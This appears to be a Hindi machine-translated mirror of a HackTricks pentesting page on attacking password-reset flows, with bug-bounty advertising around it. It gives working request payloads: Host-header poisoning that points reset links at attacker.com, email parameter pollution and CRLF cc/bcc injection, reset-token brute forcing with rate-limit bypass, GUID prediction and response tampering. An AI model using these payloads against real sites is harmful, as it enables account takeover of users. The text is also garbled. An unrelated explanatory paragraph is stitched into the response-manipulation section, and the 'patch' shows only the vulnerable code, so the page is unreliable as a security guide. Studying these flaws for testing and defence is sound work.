mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-03 18:10:07 +00:00
338 lines
27 KiB
Markdown
338 lines
27 KiB
Markdown
# रीसेट/भूल गए पासवर्ड को दूर करना
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
|
|
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें।**
|
|
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें।**
|
|
|
|
</details>
|
|
|
|
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**HackenProof में सभी क्रिप्टो बग बाउंटी होम है।**
|
|
|
|
**देरी के बिना पुरस्कार प्राप्त करें**\
|
|
HackenProof बाउंटी केवल तब शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। बग सत्यापित होने के बाद आपको इनाम मिलेगा।
|
|
|
|
**Web3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
|
|
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में web3 सुरक्षा को मास्टर करें।
|
|
|
|
**Web3 हैकर लीजेंड बनें**\
|
|
प्रतिपूर्ण बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
|
|
|
|
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
|
|
|
|
{% embed url="https://hackenproof.com/register" %}
|
|
|
|
निम्नलिखित तकनीकों का पुनर्संचयन [https://anugrahsr.github.io/posts/10-Password-reset-flaws/](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) से किया गया था।
|
|
|
|
## पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक
|
|
|
|
**HTTP रेफरर** एक ऐचटीटीपी हेडर फ़ील्ड है जो वेबपेज का पता बताता है जिससे अभियांत्रिकी की जा रही संसाधन के साथ जुड़ा है। रेफरर अनुरोध हेडर में उन वेबपेज का पता होता है जिससे वर्तमान में अनुरोधित पेज के लिए एक लिंक किया गया था।
|
|
|
|
![](https://www.optimizesmart.com/wp-content/uploads/2020/01/1-1-2.jpg)
|
|
|
|
### शोषण
|
|
|
|
* अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
|
|
* पासवर्ड रीसेट लिंक पर क्लिक करें
|
|
* पासवर्ड नहीं बदलें
|
|
* किसी तीसरे पक्ष की वेबसाइटों पर क्लिक करें (उदा। Facebook, Twitter)
|
|
* बर्पस्यूट प्रॉक्सी में अनुरोध को अवरोधित करें
|
|
* देखें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन को लीक कर रहा है।
|
|
|
|
### प्रभाव
|
|
|
|
इससे व्यक्ति जिसके पास विशेष साइट का नियंत्रण है, उपयोगकर्ता का पासवर्ड बदल सकता है (CSRF हमला), क्योंकि इस व्यक्ति को उपयोगकर्ता का रीसेट पासवर्ड टोकन पता होता है।
|
|
|
|
### संदर्भ:
|
|
|
|
* https://hackerone.com/reports/342693
|
|
* https://hackerone.com/reports/272379
|
|
* https://hackerone.com/reports/737042
|
|
* https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
|
|
* https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
|
|
|
|
## पासवर्ड रीसेट पॉइज़निंग
|
|
|
|
यदि आपको होस्ट हेडर हमला मिलता है और यह स्कोप से बाहर है, तो पासवर्ड रीसेट बटन ढूंढ़ने का प्रयास करें!
|
|
|
|
![](https://portswigger.net/web-security/images/password-reset-poisoning.svg)
|
|
|
|
### शोषण
|
|
|
|
* बर्पस्यूट में पासवर्ड रीसेट अनुरोध को अवरोधित करें
|
|
* निम्नलिखित हेडर जोड़ें या बर्पस्यूट में हेडर संपादित करें (एक-एक करके प्रयास करें)
|
|
```
|
|
Host: attacker.com
|
|
```
|
|
|
|
```
|
|
Host: target.com
|
|
X-Forwarded-Host: attacker.com
|
|
```
|
|
|
|
```
|
|
Host: target.com
|
|
Host: attacker.com
|
|
```
|
|
* जांचें कि ईमेल में पासवर्ड बदलने के लिए लिंक attacker.com को पॉइंट कर रहा है।
|
|
|
|
### पैच
|
|
|
|
`$_SERVER['HTTP_HOST']` की बजाय `$_SERVER['SERVER_NAME']` का उपयोग करें।
|
|
```php
|
|
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
|
|
```
|
|
### प्रभाव
|
|
|
|
पीड़ित व्यक्ति अपने ईमेल में दुष्ट लिंक प्राप्त करेगा और जब वह क्लिक करेगा, तो उपयोगकर्ता का पासवर्ड रीसेट लिंक / टोकन हमलावर्धक को लीक हो जाएगा, जिससे पूर्ण खाता हासिल होगा।
|
|
|
|
### संदर्भ:
|
|
|
|
* https://hackerone.com/reports/226659
|
|
* https://hackerone.com/reports/167631
|
|
* https://www.acunetix.com/blog/articles/password-reset-poisoning/
|
|
* https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
|
|
* https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
|
|
|
|
## ईमेल पैरामीटर को मार्गनिर्धारण करके पासवर्ड रीसेट
|
|
|
|
### शोषण
|
|
|
|
* & का उपयोग करके हमलावर्धक ईमेल को दूसरे पैरामीटर के रूप में जोड़ें
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email=victim@email.com&email=attacker@email.com
|
|
```
|
|
* दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें, %20 का उपयोग करें
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email=victim@email.com%20email=attacker@email.com
|
|
```
|
|
* दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें |
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email=victim@email.com|email=attacker@email.com
|
|
```
|
|
* दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें, cc के रूप में।
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
|
|
```
|
|
* द्वितीय पैरामीटर के रूप में हमलावर्ती ईमेल जोड़ें, bcc का उपयोग करके
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
|
|
```
|
|
* दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें, ,
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email="victim@mail.tld",email="attacker@mail.tld"
|
|
```
|
|
* जेसोन एरे में दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
{"email":["victim@mail.tld","atracker@mail.tld"]}
|
|
```
|
|
### संदर्भ
|
|
|
|
* https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
|
|
* https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
|
|
* https://twitter.com/HusseiN98D/status/1254888748216655872
|
|
|
|
## API पैरामीटर के माध्यम से किसी भी उपयोगकर्ता के ईमेल और पासवर्ड को बदलना
|
|
|
|
### शोषण
|
|
|
|
* हमलावर को अपने खाते से लॉगिन करना होगा और पासवर्ड बदलने के लिए चेंज पासवर्ड कार्य करना होगा
|
|
* Burp Suite शुरू करें और अनुरोध को अवरोधित करें
|
|
* अनुरोध को अवरोधित करने के बाद उसे repeater में भेजें और पैरामीटर ईमेल और पासवर्ड को संशोधित करें
|
|
```php
|
|
POST /api/changepass
|
|
[...]
|
|
("form": {"email":"victim@email.tld","password":"12345678"})
|
|
```
|
|
### संदर्भ
|
|
|
|
* https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
|
|
|
|
### कोई रेट सीमा नहीं: ईमेल बॉम्बिंग <a href="#5-no-rate-limiting-email-bombing" id="5-no-rate-limiting-email-bombing"></a>
|
|
|
|
### शोषण
|
|
|
|
* बर्प स्वचालित शुरू करें और पासवर्ड रीसेट अनुरोध को अवरोधित करें
|
|
* इंट्रूडर को भेजें
|
|
* शून्य पेलोड का उपयोग करें
|
|
|
|
### संदर्भ
|
|
|
|
* https://hackerone.com/reports/280534
|
|
* https://hackerone.com/reports/794395
|
|
|
|
## पासवर्ड रीसेट टोकन कैसे उत्पन्न होता है यह जानें
|
|
|
|
पासवर्ड रीसेट टोकन के पैटर्न को समझें
|
|
|
|
![](https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSvCcLcUTksGbpygrJB4III5BTBYEzYQfKJyg\&usqp=CAU)
|
|
|
|
यदि यह
|
|
|
|
* टाइमस्टैम्प पर आधारित उत्पन्न होता है
|
|
* उपयोगकर्ता के यूज़रआईडी पर आधारित उत्पन्न होता है
|
|
* उपयोगकर्ता के ईमेल पर आधारित उत्पन्न होता है
|
|
* पहले नाम और अंतिम नाम पर आधारित उत्पन्न होता है
|
|
* जन्मतिथि पर आधारित उत्पन्न होता है
|
|
* एन्क्रिप्टिक्रिप्टी पर आधारित उत्पन्न होता है
|
|
|
|
टोकन की यादृच्छिकता या पूर्वानुमानित करने के लिए बर्प सीक्वेंसर का उपयोग करें।
|
|
|
|
## अनुमान लगाने योग्य GUID
|
|
|
|
विभिन्न प्रकार के GUID होते हैं:
|
|
|
|
* **संस्करण 0:** केवल शून्य GUID में देखा जाता है ("00000000-0000-0000-0000-000000000000")।
|
|
* **संस्करण 1:** GUID एक पूर्व-निर्धारित तरीके से उत्पन्न होता है जिसमें:
|
|
* वर्तमान समय
|
|
* एक यादृच्छिक रूप से उत्पन्न "घड़ी अनुक्रम" जो उत्पन्न करने वाले सिस्टम के उपयोग के दौरान GUID के बीच स्थायी रहता है
|
|
* एक "नोड आईडी", जो सिस्टम के MAC पते पर आधारित उत्पन्न होता है यदि यह उपलब्ध है
|
|
* **संस्करण 3:** GUID एक प्रदान किए गए नाम और नेमस्पेस के MD5 हैश का उपयोग करके उत्पन्न होता है।
|
|
* **संस्करण 4:** GUID यादृच्छिक रूप से उत्पन्न होता है।
|
|
* **संस्करण 5:** GUID एक प्रदान किए गए नाम और नेमस्पेस के SHA1 हैश का उपयोग करके उत्पन्न होता है।
|
|
|
|
GUID को देखकर उसका संस्करण जाना संभव है, इसके लिए एक छोटा उपकरण है: [**guidtool**](https://github.com/intruder-io/guidtool)\*\*\*\*
|
|
```http
|
|
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
|
|
UUID version: 1
|
|
UUID time: 2021-11-17 17:52:18.141000
|
|
UUID timestamp: 138564643381410000
|
|
UUID node: 17547390002044
|
|
UUID MAC address: 0f:f5:91:f2:a3:7c
|
|
UUID clock sequence: 3426
|
|
```
|
|
यदि रीसेट पासवर्ड GUID उत्पन्न करने के लिए उपयोग की गई संस्करण 1 है, तो GUIDS को ब्रूटफोर्स किया जा सकता है:
|
|
```http
|
|
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
|
|
a34aca00-47d0-11ec-8d62-0ff591f2a37c
|
|
a34af110-47d0-11ec-8d62-0ff591f2a37c
|
|
```
|
|
### संदर्भ
|
|
|
|
* [https://www.intruder.io/research/in-guid-we-trust](https://www.intruder.io/research/in-guid-we-trust)
|
|
|
|
## प्रतिक्रिया मानिपुरण: बुरी प्रतिक्रिया को अच्छी प्रतिक्रिया से बदलें
|
|
|
|
इस तरह के अनुरोध और प्रतिक्रिया की तलाश करें
|
|
```php
|
|
HTTP/1.1 401 Unauthorized
|
|
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
|
|
```
|
|
# रीसेट पासवर्ड
|
|
|
|
जब एक उपयोगकर्ता अपना पासवर्ड भूल जाता है, तो उन्हें अपना पासवर्ड रीसेट करने की आवश्यकता होती है। इसके लिए वेब ऐप्लिकेशनों में एक "पासवर्ड रीसेट" कार्रवाई होती है। इस कार्रवाई के दौरान, उपयोगकर्ता को एक रीसेट लिंक या टोकन द्वारा पहुंच दिया जाता है, जिसका उपयोग करके वे अपना पासवर्ड बदल सकते हैं।
|
|
|
|
यह प्रक्रिया आमतौर पर निम्नलिखित चरणों का पालन करती है:
|
|
|
|
1. उपयोगकर्ता अपना ईमेल आईडी दर्ज करता है और "पासवर्ड रीसेट" या समर्थित बटन पर क्लिक करता है।
|
|
2. वेब ऐप्लिकेशन उपयोगकर्ता के ईमेल पते पर एक रीसेट लिंक या टोकन भेजता है।
|
|
3. उपयोगकर्ता अपने ईमेल खाते की जांच करता है और रीसेट लिंक पर क्लिक करता है।
|
|
4. उपयोगकर्ता को एक पासवर्ड रीसेट पेज पर निर्देशित किया जाता है, जहां वे अपना नया पासवर्ड दर्ज कर सकते हैं।
|
|
5. उपयोगकर्ता नया पासवर्ड दर्ज करता है और उसे सत्यापित करने के लिए दोबारा दर्ज करता है।
|
|
6. वेब ऐप्लिकेशन नया पासवर्ड स्वीकार करता है और उपयोगकर्ता के खाते का पासवर्ड बदल देता है।
|
|
|
|
इस प्रक्रिया के दौरान, सुरक्षा के महत्वपूर्ण मामलों का ध्यान रखना आवश्यक होता है। उपयोगकर्ता के ईमेल पते की पुष्टि करने के लिए विशेषता, रीसेट लिंक या टोकन की मान्यता की जांच, और पासवर्ड की मजबूती की जांच शामिल होती है। इसके अलावा, रीसेट लिंक की समय सीमा और उपयोगकर्ता के खाते की सुरक्षा को बढ़ाने के लिए अतिरिक्त सुरक्षा उपाय भी लिए जा सकते हैं।
|
|
```php
|
|
HTTP/1.1 200 OK
|
|
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
|
|
```
|
|
### संदर्भ
|
|
|
|
* https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
|
|
|
|
### समाप्त हो चुके टोकन का उपयोग करें <a href="#8-using-expired-token" id="8-using-expired-token"></a>
|
|
|
|
* जांचें कि क्या संदिग्ध टोकन का पुनः उपयोग किया जा सकता है
|
|
|
|
### पासवर्ड रीसेट टोकन को ब्रूटफोर्स करें <a href="#9-brute-force-password-rest-token" id="9-brute-force-password-rest-token"></a>
|
|
|
|
Burpsuite का उपयोग करके रीसेट टोकन को ब्रूटफोर्स करने का प्रयास करें
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email=victim@email.com&code=$BRUTE$
|
|
```
|
|
* आईपी-रोटेटर का उपयोग करें burpsuite पर आईपी आधारित रेटलिमिट को बाइपास करने के लिए।
|
|
|
|
### संदर्भ
|
|
|
|
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
|
|
|
|
### अपने टोकन का प्रयोग करने की कोशिश करें <a href="#10-try-using-your-token" id="10-try-using-your-token"></a>
|
|
|
|
* पीड़ित के खाते में अपने पासवर्ड रीसेट टोकन को जोड़ने की कोशिश करें।
|
|
```php
|
|
POST /resetPassword
|
|
[...]
|
|
email=victim@email.com&code=$YOUR_TOKEN$
|
|
```
|
|
### संदर्भ
|
|
|
|
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
|
|
|
|
## लॉगआउट/पासवर्ड रीसेट में सत्र अमान्यकरण
|
|
|
|
जब एक उपयोगकर्ता लॉगआउट करता है या अपना पासवर्ड रीसेट करता है, तो मौजूदा सत्र को अमान्य कर देना चाहिए।\
|
|
इसलिए, उपयोगकर्ता लॉगइन होते समय कुकीज़ को ग्रहण करें, लॉगआउट करें, और देखें कि क्या कुकीज़ अब भी मान्य हैं।\
|
|
लॉगआउट करने की बजाय पासवर्ड बदलते समय यह प्रक्रिया दोहराएं।
|
|
|
|
## रीसेट टोकन समय सीमा
|
|
|
|
**रीसेट टोकन को समय सीमा होनी चाहिए**, इसके बाद टोकन एक उपयोगकर्ता के पासवर्ड बदलने के लिए मान्य नहीं होना चाहिए।
|
|
|
|
## अतिरिक्त जांचें
|
|
|
|
* उपयोगकर्ता नाम@burp\_collab.net का उपयोग करें और कॉलबैक विश्लेषण करें
|
|
* उपयोगकर्ता कार्बन कॉपी ईमेल=victim@mail.com%0a%0dcc:hacker@mail.com
|
|
* लंबा पासवर्ड (>200) DoS के लिए लीड करता है
|
|
* दूसरे ईमेल पैरामीटर और मान जोड़ें
|
|
|
|
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**HackenProof सभी क्रिप्टो बग बाउंटी के लिए घर है।**
|
|
|
|
**देरी के बिना पुरस्कार प्राप्त करें**\
|
|
HackenProof बाउंटी केवल तब शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। आपको इनाम उस बग को सत्यापित करने के बाद मिलेगा।
|
|
|
|
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
|
|
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! इसके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।
|
|
|
|
**वेब3 हैकर लीजेंड बनें**\
|
|
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
|
|
|
|
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
|
|
|
|
{% embed url="https://hackenproof.com/register" %}
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आपको **PEASS की नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
|
|
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**।**
|
|
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
|
|
|
|
</details>
|